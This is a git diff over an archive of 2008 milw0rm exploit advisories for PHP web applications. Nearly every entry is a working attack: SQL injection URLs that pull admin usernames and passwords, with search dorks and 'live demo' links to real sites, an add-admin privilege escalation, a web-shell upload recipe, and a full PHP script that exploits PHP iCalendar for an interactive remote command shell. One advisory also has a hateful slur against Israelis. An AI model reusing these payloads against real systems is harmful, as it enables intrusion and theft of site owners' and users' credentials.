+[~] If he does not work test yet -> /question.php?ID=-1
+[~] 
+[~] Demo :- 
+[~]
+[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20/*
+[~]
+[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/*
+[~]
+[~]----------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6511.txt b/platforms/php/webapps/6511.txt
index ef73f736a..e3d01b6cc 100755
--- a/platforms/php/webapps/6511.txt
+++ b/platforms/php/webapps/6511.txt
@@ -1,64 +1,64 @@
-|___________________________________________________|
-|
-| 6rbScript V3.3 (singerid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : www.6rbscript.com
-|
-| DorK   : inurl:"section.php?name=singers"
-| dorK   : Powered By 6rbScript V3.3
-|___________________________________________________|
-
-
-Exploit:
-________
-
-
-user name
-_______
-
-www.[target].com/[PATS]/section.php?name=singers&f=songs&singerid=-1+union+select+1,aid,3,4,5,6+from+7addad_authors--
-
-
-password
-_______
-
-http://localhost/Script/section.php?name=singers&f=songs&singerid=-1+union+select+1,pwd,3,4,5,6+from+7addad_authors--
-
-
-
-
-Admin LogIn :
-
-www.[target].com/cpanel.php
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
-|______________________________________________________________________
-
-
-                             Im IRAQi
-
-# milw0rm.com [2008-09-21]
+|___________________________________________________|
+|
+| 6rbScript V3.3 (singerid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : www.6rbscript.com
+|
+| DorK   : inurl:"section.php?name=singers"
+| dorK   : Powered By 6rbScript V3.3
+|___________________________________________________|
+
+
+Exploit:
+________
+
+
+user name
+_______
+
+www.[target].com/[PATS]/section.php?name=singers&f=songs&singerid=-1+union+select+1,aid,3,4,5,6+from+7addad_authors--
+
+
+password
+_______
+
+http://localhost/Script/section.php?name=singers&f=songs&singerid=-1+union+select+1,pwd,3,4,5,6+from+7addad_authors--
+
+
+
+
+Admin LogIn :
+
+www.[target].com/cpanel.php
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
+|______________________________________________________________________
+
+
+                             Im IRAQi
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6512.txt b/platforms/php/webapps/6512.txt
index 0f597efad..10828c40c 100755
--- a/platforms/php/webapps/6512.txt
+++ b/platforms/php/webapps/6512.txt
@@ -1,25 +1,25 @@
-Diesel Job Site Blind Sql Injection P0c
-Author : Stack
-Home Script :  http://www.dieselscripts.com
-
-Desc :
-look the select Job Viewed: in [real id]+and+1=1 (true) the times change each time
-but in [real id]+and+1=0 (false) it remains stable
- 
-go to url exploit or poc 2 or 3 times for see the difference
-between (true) and (false)
- 
-P0c :
-http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=1
-http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=0
-Exploit :
-http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=5
-http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=4
-Live Demo P0c :
-http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=1
-http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=0
-Live Demo Exploit :
-http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=5
-http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=4
-
-# milw0rm.com [2008-09-21]
+Diesel Job Site Blind Sql Injection P0c
+Author : Stack
+Home Script :  http://www.dieselscripts.com
+
+Desc :
+look the select Job Viewed: in [real id]+and+1=1 (true) the times change each time
+but in [real id]+and+1=0 (false) it remains stable
+ 
+go to url exploit or poc 2 or 3 times for see the difference
+between (true) and (false)
+ 
+P0c :
+http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=1
+http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=0
+Exploit :
+http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=5
+http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=4
+Live Demo P0c :
+http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=1
+http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=0
+Live Demo Exploit :
+http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=5
+http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=4
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6513.txt b/platforms/php/webapps/6513.txt
index f00e3e730..5c0c8c954 100755
--- a/platforms/php/webapps/6513.txt
+++ b/platforms/php/webapps/6513.txt
@@ -1,55 +1,55 @@
-============================================================
-  Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability
-============================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-AUTHOR : CWH Underground
-DATE   : 21 September 2008
-SITE   : cwh.citec.us
-
-
-###################################################################################
-APPLICATION : Rianxosencabos CMS
-VERSION     : 0.9
-DOWNLOAD    : http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
-###################################################################################
-
-
---- Add-Admin / Delete-Account Vulnerability ---
-
-
--------------
- Description
--------------
-
-    Rianxosencabos CMS 0.9 has Vulnerability to escalate user to administartor's privilege.
-That Vulnerable in "http://[Target]/[rsccms_path]/?s=admin&accion=lista" and You can Arbitrary change user's permission or delete user
-
-    This action will give your account can use All Admin Control Panel with Administrative's Privilege or Arbitrary Delete account in website.
-
-
---------------
- Exploit code
---------------
-[+] Log in with your account, You can register with this URL "http://[Target]/[rsccms_path]/?s=usuarios&accion=registrar"
-[+] Go to "http://[Target]/[rsccms_path]/?s=admin&accion=lista"
-[+] Now you can Change user permission or delete user account
-
-
-#####################################################################
- Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
- Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-# milw0rm.com [2008-09-21]
+============================================================
+  Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability
+============================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+AUTHOR : CWH Underground
+DATE   : 21 September 2008
+SITE   : cwh.citec.us
+
+
+###################################################################################
+APPLICATION : Rianxosencabos CMS
+VERSION     : 0.9
+DOWNLOAD    : http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
+###################################################################################
+
+
+--- Add-Admin / Delete-Account Vulnerability ---
+
+
+-------------
+ Description
+-------------
+
+    Rianxosencabos CMS 0.9 has Vulnerability to escalate user to administartor's privilege.
+That Vulnerable in "http://[Target]/[rsccms_path]/?s=admin&accion=lista" and You can Arbitrary change user's permission or delete user
+
+    This action will give your account can use All Admin Control Panel with Administrative's Privilege or Arbitrary Delete account in website.
+
+
+--------------
+ Exploit code
+--------------
+[+] Log in with your account, You can register with this URL "http://[Target]/[rsccms_path]/?s=usuarios&accion=registrar"
+[+] Go to "http://[Target]/[rsccms_path]/?s=admin&accion=lista"
+[+] Now you can Change user permission or delete user account
+
+
+#####################################################################
+ Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
+ Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6514.txt b/platforms/php/webapps/6514.txt
index bb9ac22e9..e3b1e643c 100755
--- a/platforms/php/webapps/6514.txt
+++ b/platforms/php/webapps/6514.txt
@@ -1,65 +1,64 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by :  Cyb3r-1sT
-
-<> C0ntact  : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups   : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-
-<<->> script        : Availscript Jobs Portal Script
-
-<<->> script site : www.availscript.com             
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : N0-WaY
-
-<<->> Exploit :
-
-        1) first Register in site in ( Employers Signup ) ...... www.site.me/registeremp.php
-        
-        2) login as Employer and goto  Edit Image/Logo ..... www.site.me/employer/editlogo.php .. u can upload shell ( shell.php )  
-         
-        3) hack site :) finished 
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-
-<<->> InjEctOr5 TeaM  :: InjEctOr $ haker-b0y $ Mr.Dangers $ Eng.Silent Night $ QalbHamad $ fisher762 $ Sp1d3r_N3T $ ToTaL $ z3rO s3v3n $ RooT-Hacker
-
-<<->> My  best old freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ br1ght-dark  $ Golden-zero
-
-<<->>  Then TrYaG Te4m & there Forum ( www.tryag.cc/cc ) 
-
-<<->> All muslims
-
-# milw0rm.com [2008-09-21]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by :  Cyb3r-1sT
+
+<> C0ntact  : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups   : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+
+<<->> script        : Availscript Jobs Portal Script
+
+<<->> script site : www.availscript.com             
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : N0-WaY
+
+<<->> Exploit :
+
+        1) first Register in site in ( Employers Signup ) ...... www.site.me/registeremp.php
+        
+        2) login as Employer and goto  Edit Image/Logo ..... www.site.me/employer/editlogo.php .. u can upload shell ( shell.php )  
+         
+        3) hack site :) finished 
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+
+<<->> InjEctOr5 TeaM  :: InjEctOr $ haker-b0y $ Mr.Dangers $ Eng.Silent Night $ QalbHamad $ fisher762 $ Sp1d3r_N3T $ ToTaL $ z3rO s3v3n $ RooT-Hacker
+
+<<->> My  best old freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ br1ght-dark  $ Golden-zero
+
+<<->>  Then TrYaG Te4m & there Forum ( www.tryag.cc/cc ) 
+
+<<->> All muslims
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6516.txt b/platforms/php/webapps/6516.txt
index 9b5c65e1d..1faaf3491 100755
--- a/platforms/php/webapps/6516.txt
+++ b/platforms/php/webapps/6516.txt
@@ -1,36 +1,36 @@
-####################################################
-e107 Plugin Akira Powered's "Image Gallery" Remote SQL-injetion Vulnerability
-####################################################
-
-#####################################
-Author: boom3rang
-Site: www.khg-crew.ws
-Greetz: KHG & H!tm@N & chs & redc00de & proxy-ki11er  
-Site: www.khg-crew.ws
-#####################################
-
-
-- Download Plugin:  http://www.akirapowered.org/download.php?view.73
-
-- Dork:
-inurl:image_gallery.php?page=image-detail
-
-- POC:
-http://www.site.com/e107_Path/image_gallery/image_gallery.php?page=image-detail&album=1&image=[exploit]
-
-- Exploit:
--9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
-
-- Live demo:
-http://www.ifitbleeds.net/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
-
-
-
-#########################################
-- Kosova Hackers Group
-- United States of Albania
-- Proud to be Albanian
-- Proud to be Muslim
-#########################################
-
-# milw0rm.com [2008-09-21]
+####################################################
+e107 Plugin Akira Powered's "Image Gallery" Remote SQL-injetion Vulnerability
+####################################################
+
+#####################################
+Author: boom3rang
+Site: www.khg-crew.ws
+Greetz: KHG & H!tm@N & chs & redc00de & proxy-ki11er  
+Site: www.khg-crew.ws
+#####################################
+
+
+- Download Plugin:  http://www.akirapowered.org/download.php?view.73
+
+- Dork:
+inurl:image_gallery.php?page=image-detail
+
+- POC:
+http://www.site.com/e107_Path/image_gallery/image_gallery.php?page=image-detail&album=1&image=[exploit]
+
+- Exploit:
+-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
+
+- Live demo:
+http://www.ifitbleeds.net/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_password)KHG+from+e107_user+where+user_id=1--
+
+
+
+#########################################
+- Kosova Hackers Group
+- United States of Albania
+- Proud to be Albanian
+- Proud to be Muslim
+#########################################
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6517.txt b/platforms/php/webapps/6517.txt
index 2710df754..54ee1dbf8 100755
--- a/platforms/php/webapps/6517.txt
+++ b/platforms/php/webapps/6517.txt
@@ -1,30 +1,30 @@
-######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
-##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
-##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
-######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
-##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
-##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
-######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
-################################ !R4Q!4N H4CK3R  ###################################
-NetArtMedia Jobs Portal 1.3  Multiple Sql Injection Vulnerabilities
-Website    : http://www.netartmedia.net
-Founded By : Encrypt3d.M!nd
-Home Page  : http://encrypt3d.blogspot.com
-
-# Remote Sql Injection(s) :
-Affected File(s) :
-index.php
- 
-PoC:
-/index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users
-/index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users
-Administration Panel:
-/ADMIN/login.php
-
-# Greetz:
-MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
-KoRn The Dog,MiNi-SpIder,All My Friends
-
-The EnD :D
-
-# milw0rm.com [2008-09-21]
+######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
+##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
+##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
+######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
+##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
+##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
+######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
+################################ !R4Q!4N H4CK3R  ###################################
+NetArtMedia Jobs Portal 1.3  Multiple Sql Injection Vulnerabilities
+Website    : http://www.netartmedia.net
+Founded By : Encrypt3d.M!nd
+Home Page  : http://encrypt3d.blogspot.com
+
+# Remote Sql Injection(s) :
+Affected File(s) :
+index.php
+ 
+PoC:
+/index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users
+/index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users
+Administration Panel:
+/ADMIN/login.php
+
+# Greetz:
+MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
+KoRn The Dog,MiNi-SpIder,All My Friends
+
+The EnD :D
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6518.txt b/platforms/php/webapps/6518.txt
index 202414004..3de718919 100755
--- a/platforms/php/webapps/6518.txt
+++ b/platforms/php/webapps/6518.txt
@@ -1,30 +1,30 @@
-######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
-##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
-##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
-######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
-##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
-##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
-######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
-################################ !R4Q!4N H4CK3R  ###################################
-NetArtMedia Real Estate Portal v2.0  Sql Injection Vulnerability
-Website    : http://www.netartmedia.net
-Founded By : Encrypt3d.M!nd
-Home Page  : http://encrypt3d.blogspot.com
-
-# Remote Sql Injection(s) :
-Affected File :
-index.php
-
-PoC:
-/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users
-
-Administration Panel:
-/ADMIN/login.php
-
-# Greetz:
-MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
-KoRn The Dog,MiNi-SpIder,All My Friends
-
-The EnD :D
-
-# milw0rm.com [2008-09-21]
+######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
+##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
+##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
+######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
+##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
+##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
+######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
+################################ !R4Q!4N H4CK3R  ###################################
+NetArtMedia Real Estate Portal v2.0  Sql Injection Vulnerability
+Website    : http://www.netartmedia.net
+Founded By : Encrypt3d.M!nd
+Home Page  : http://encrypt3d.blogspot.com
+
+# Remote Sql Injection(s) :
+Affected File :
+index.php
+
+PoC:
+/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users
+
+Administration Panel:
+/ADMIN/login.php
+
+# Greetz:
+MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
+KoRn The Dog,MiNi-SpIder,All My Friends
+
+The EnD :D
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6519.php b/platforms/php/webapps/6519.php
index e34f46b8e..84df07e7e 100755
--- a/platforms/php/webapps/6519.php
+++ b/platforms/php/webapps/6519.php
@@ -1,127 +1,127 @@
-'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].'
    ';
-	84.			} else {
-	85.				$addupdate_msg = $addupdate_msg . ''.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].'
    ';
-	86.			}
-	87.		}
-	88.	}
-	
-	restricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file
-	(with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally
-	recognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the
-	same LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched!
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-define(STDIN, fopen("php://stdin", "r"));
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-print "\n+---------------------------------------------------------------------------+";
-print "\n| PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |";
-print "\n+---------------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage......: php $argv[0] host path\n";
-	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /phpicalendar/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-$payload  = "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
-$payload .= "addupdate\r\n";
-$payload .= "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"calfile[1]\"; filename=\"fake_cal.ics\"\r\n\r\n";
-$payload .= "BEGIN:VCALENDAR\n\r\n";
-$payload .= "--o0oOo0o--\r\n";
-
-$packet   = "POST {$path}admin/index.php HTTP/1.0\r\n";
-$packet  .= "Host: {$host}\r\n";
-$packet  .= "Content-Length: ".strlen($payload)."\r\n";
-$packet  .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet  .= "Connection: close\r\n\r\n";
-$packet  .= $payload;
-	
-http_send($host, $packet);
-
-$packet  = "GET {$path}preferences.php?action=setcookie HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Connection: close\r\n\r\n";
-
-preg_match("/Set-Cookie: (phpicalendar_[^=]*)=/", http_send($host, $packet), $cookie);
-
-$data = urlencode(serialize(array("cookie_language" => "../calendars/fake_cal.ics".chr(0))));
-
-while(1)
-{
-	print "\nphpicalendar-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$packet  = "GET {$path}print.php HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
-		$packet .= "Cookie: {$cookie[1]}={$data}\r\n";
-		$packet .= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet .= "Connection: close\r\n\r\n";
-		$output  = http_send($host, $packet);
-		$shell   = explode("_code_", $output);
-		preg_match("/_code_/", $output) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-09-21]
+'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].'
    ';
+	84.			} else {
+	85.				$addupdate_msg = $addupdate_msg . ''.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].'
    ';
+	86.			}
+	87.		}
+	88.	}
+	
+	restricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file
+	(with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally
+	recognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the
+	same LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched!
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+define(STDIN, fopen("php://stdin", "r"));
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+print "\n+---------------------------------------------------------------------------+";
+print "\n| PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |";
+print "\n+---------------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage......: php $argv[0] host path\n";
+	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /phpicalendar/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+$payload  = "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
+$payload .= "addupdate\r\n";
+$payload .= "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"calfile[1]\"; filename=\"fake_cal.ics\"\r\n\r\n";
+$payload .= "BEGIN:VCALENDAR\n\r\n";
+$payload .= "--o0oOo0o--\r\n";
+
+$packet   = "POST {$path}admin/index.php HTTP/1.0\r\n";
+$packet  .= "Host: {$host}\r\n";
+$packet  .= "Content-Length: ".strlen($payload)."\r\n";
+$packet  .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet  .= "Connection: close\r\n\r\n";
+$packet  .= $payload;
+	
+http_send($host, $packet);
+
+$packet  = "GET {$path}preferences.php?action=setcookie HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Connection: close\r\n\r\n";
+
+preg_match("/Set-Cookie: (phpicalendar_[^=]*)=/", http_send($host, $packet), $cookie);
+
+$data = urlencode(serialize(array("cookie_language" => "../calendars/fake_cal.ics".chr(0))));
+
+while(1)
+{
+	print "\nphpicalendar-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$packet  = "GET {$path}print.php HTTP/1.0\r\n";
+		$packet .= "Host: {$host}\r\n";
+		$packet .= "Cookie: {$cookie[1]}={$data}\r\n";
+		$packet .= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet .= "Connection: close\r\n\r\n";
+		$output  = http_send($host, $packet);
+		$shell   = explode("_code_", $output);
+		preg_match("/_code_/", $output) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6520.txt b/platforms/php/webapps/6520.txt
index f26341e88..31cbeef2a 100755
--- a/platforms/php/webapps/6520.txt
+++ b/platforms/php/webapps/6520.txt
@@ -1,20 +1,20 @@
-|___________________________________________________|
-|
-| 6rbScript V3.3 Local file Vulnerability
-|
-|___________________________________________________
-|                                                   |
-|
-| script : www.6rbscript.com
-|
-| DorK   : inurl:"section.php?name=singers"
-| dorK   : Powered By 6rbScript V3.3
-|___________________________________________________|
- 
-Author : Stack
- 
-Expl need magic quote = off & open basdir = off in many server
- 
